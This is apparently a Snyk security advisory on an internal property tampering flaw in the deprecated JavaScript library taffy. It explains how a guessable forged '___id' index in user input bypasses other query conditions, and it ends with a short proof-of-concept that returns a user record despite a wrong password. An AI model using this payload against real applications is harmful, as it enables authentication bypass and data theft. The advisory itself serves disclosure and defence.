Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsThere is no fixed version for taffy
.
taffy is an opensouce library that brings database features into your JavaScript applications.
Affected versions of this package are vulnerable to Internal Property Tampering. taffy
sets an internal index for each data item in its DB. However, it is found that the internal index can be forged by adding additional properties into user-input. If an index is found in the query, taffyDB
will ignore other query conditions and directly return the indexed data item. Moreover, the internal index is in an easily-guessable format (e.g. T000002R000001
). As such, attackers can use this vulnerability to access any data items in the DB and exploit an SQL Injection.
Note: The taffy package has been deprecated by the author. Its successor package, taffydb, is also found to be vulnerable and is not actively maintained.
var TAFFY = require('taffy'); var friends = TAFFY([ {"id":1,"gender":"M","username":"Smith","password":"aaa","status":"Active"}, {"id":2,"gender":"F","username":"Ruth","password":"bbb","status":"Active"}, {"id":3,"gender":"M","username":"Stevenson","password":"ccc","status":"Active"}, {"id":4,"gender":"F","username":"Gill","password":"ddd","status":"Active"} ]);
var json = {username:"Smith", "password":"123", "___id":"T000002R000002", "___s":true}; var item1 = friends(json); console.log(item1.first());